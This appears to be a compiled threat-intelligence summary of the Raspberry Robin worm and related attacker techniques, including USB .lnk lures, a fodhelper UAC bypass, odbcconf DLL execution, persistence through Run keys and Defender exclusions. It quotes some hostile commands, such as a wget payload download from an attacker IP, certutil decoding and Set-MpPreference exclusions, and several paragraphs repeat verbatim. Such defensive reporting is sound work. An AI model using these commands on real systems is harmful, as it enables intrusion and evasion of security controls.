Raspberry Robin

Initial access Raspberry Robin is typically introduced via infected removable drives, often USB devices.

The content repeatedly describes threat actors and malware using WMI/WMIC/wmiexec for remote execution, lateral movement, discovery, persistence, and administrative actions; e.g., 'APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit' and 'Scattered Spider used Windows Management Instrumentation (WMI) to move laterally via Impacket.'

APT19 downloaded and launched code within a SCT file; APT32 used COM scriptlets to download Cobalt Strike beacons; APT37 used Ruby scripts to execute payloads; ArcaneDoor included the adversary executing command line interface (CLI) commands.

The content repeatedly describes use of cmd.exe, cmd /c, Windows command shell, and xp_cmdshell to execute commands, run payloads, launch binaries, perform reconnaissance, persistence, cleanup, and ransomware actions. Examples include: 'Sandworm Team used the xp_cmdshell command in MS-SQL', 'APT41 used cmd.exe /c to execute commands on remote machines', and many malware families 'can use cmd.exe to execute commands on a compromised host.'

Raspberry Robin variants can be delivered via highly obfuscated Windows Script Files (WSF) for initial execution.

The Raspberry Robin worm often appears as a shortcut .lnk file masquerading as a legitimate folder on the infected USB device.

The rundll32.exe command starts another legitimate Windows utility, in this case odbcconf.exe , and passes in additional commands to execute and configure the recently-installed malicious DLL bznwi.ku.

Across the content, malware repeatedly 'adds Registry Run keys', 'creates Registry entries', 'modifies the Windows Registry', or 'overwrites registry keys' to maintain persistence.

The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder. | AppleSeed has the ability to create the Registry key name EstsoftAutoUpdate at HKCU\Software\Microsoft/Windows\CurrentVersion\RunOnce to establish persistence. AvosLocker has been executed via the RunOnce Registry key to run itself on safe mode. Raspberry Robin will use a Registry key to achieve persistence through reboot, setting a RunOnce key...

The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or .bat files in the Windows Startup folder. | AppleSeed has the ability to create the Registry key name EstsoftAutoUpdate at HKCU\Software\Microsoft/Windows\CurrentVersion\RunOnce to establish persistence. AvosLocker has been executed via the RunOnce Registry key to run itself on safe mode. Raspberry Robin will use a Registry key to achieve persistence through reboot, setting a RunOnce key...

"...has presented the user with a UAC prompt to elevate privileges..."; "...has bypassed UAC..."; "...bypass Windows UAC...execute the next payload with higher privileges."

The content repeatedly describes malware and threat actors using obfuscated code, encrypted strings, Base64/XOR/RC4/AES encoding, VMProtect/ConfuserEx/SmartAssembly, stack strings, control-flow flattening, opaque predicates, and hidden payloads to evade analysis and detection.

The Raspberry Robin worm often appears as a shortcut .lnk file masquerading as a legitimate folder on the infected USB device.

The content repeatedly describes threat actors and malware deleting files, tools, scripts, logs, droppers, staged data, and artifacts from compromised systems to cover tracks, remove evidence, or self-delete.

The content repeatedly describes malware and threat actors decoding, decrypting, or deobfuscating payloads, strings, configuration data, commands, and C2 traffic prior to execution or use, e.g., 'APT28 macro uses the command certutil -decode to decode contents of a .txt file storing the base64 encoded payload' and 'Action RAT can use Base64 to decode actor-controlled C2 server communications.'

Next, msiexec.exe launches a legitimate Windows utility, fodhelper.exe , which in turn spawns rundll32.exe to execute a malicious command. Processes launched by fodhelper.exe run with elevated administrative privileges without requiring a User Account Control prompt.

While msiexec.exe downloads and executes legitimate installer packages, adversaries also leverage it to deliver malware. Raspberry Robin uses msiexec.exe to attempt external network communication to a malicious domain for C2 purposes.

Since odbcconf.exe has a built-in regsvr flag similar to regsvr32.exe , it can be used by adversaries to execute DLLs and bypass application control defenses that aren’t monitoring for odbcconf.exe misuse.

fodhelper.exe , which in turn spawns rundll32.exe to execute a malicious command.

it performs various anti-emulator checks by trying to load nonexistent dynamic link libraries... This sample then uses the anti-emulation technique... retrieving the address of a function exported by kernel32 that only exists in emulators... If either... are successfully resolved, the loader concludes that it is running in an emulated environment and will not perform malicious activities.

Several entries describe malware examining running processes to determine if a debugger, sandbox, virtual environment, or analysis/security tools are present, such as AsyncRAT checking for a debugger, RogueRobin enumerating Wireshark and Sysinternals processes, and P8RAT checking for processes associated with virtual environments.

The rundll32.exe command starts another legitimate Windows utility, in this case odbcconf.exe , and passes in additional commands to execute and configure the recently-installed malicious DLL bznwi.ku.

Across the content, malware repeatedly 'adds Registry Run keys', 'creates Registry entries', 'modifies the Windows Registry', or 'overwrites registry keys' to maintain persistence.

The content repeatedly describes malware and threat actors collecting usernames, identifying logged-in users, running whoami/query user/quser, checking admin status, and enumerating user sessions.

The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.

Examples include 'TrickBot can identify the user and groups the user belongs to on a compromised host' and multiple entries checking whether the current user is an administrator or has elevated privileges.

The content repeatedly describes malware and threat actors collecting host details such as OS version, hostname, architecture, CPU, memory, BIOS, domain, language, and other configuration data; e.g., "APT41 uses multiple built-in commands such as systeminfo and net config Workstation to enumerate victim system basic configuration information."

it performs various anti-emulator checks by trying to load nonexistent dynamic link libraries... This sample then uses the anti-emulation technique... retrieving the address of a function exported by kernel32 that only exists in emulators... If either... are successfully resolved, the loader concludes that it is running in an emulated environment and will not perform malicious activities.

Several entries describe malware examining running processes to determine if a debugger, sandbox, virtual environment, or analysis/security tools are present, such as AsyncRAT checking for a debugger, RogueRobin enumerating Wireshark and Sysinternals processes, and P8RAT checking for processes associated with virtual environments.

Initial access Raspberry Robin is typically introduced via infected removable drives, often USB devices.

The content repeatedly describes threat actors, malware, and campaigns using HTTP and/or HTTPS for command and control, including examples such as BlackEnergy communicating with C2 over HTTP POST requests and many other families using HTTP/S for C2.

We observed outbound C2 activity involving the processes regsvr32.exe , rundll32.exe , and dllhost.exe executing without any command-line parameters and making external network connections to IP addresses associated with TOR nodes.

Examples include: 'APT41 used HTTP to download payloads for CVE-2019-19781 and CVE-2020-10189 exploits,' 'APT41 ran wget http://103.224.80[.]44:8080/kernel to download malicious payloads,' and many malware families used HTTP GET/POST or HTTPS to download additional payloads or files.

The content repeatedly describes threat actors and malware disabling, stopping, uninstalling, or modifying antivirus, EDR, Windows Defender, AMSI, logging, and other security controls.

BlackByte Ransomware 'adds .JS and .EXE extensions to the Microsoft Defender exclusion list'; PureCrypter 'executed Set-MpPreference -ExclusionPath'; QakBot 'modify the Registry to add its binaries to the Windows Defender exclusion list'; Raspberry Robin 'add an exception to Microsoft Defender that excludes the entire main drive'; StrongPity 'add directories used by the malware to the Windows Defender exclusions list'; XLoader 'can add the path of its executable to the Microsoft Defender exclusion list'; ZIPLINE 'can add itself to the exclusion list for the Ivanti Connect Secure Integrity Checker Tool.'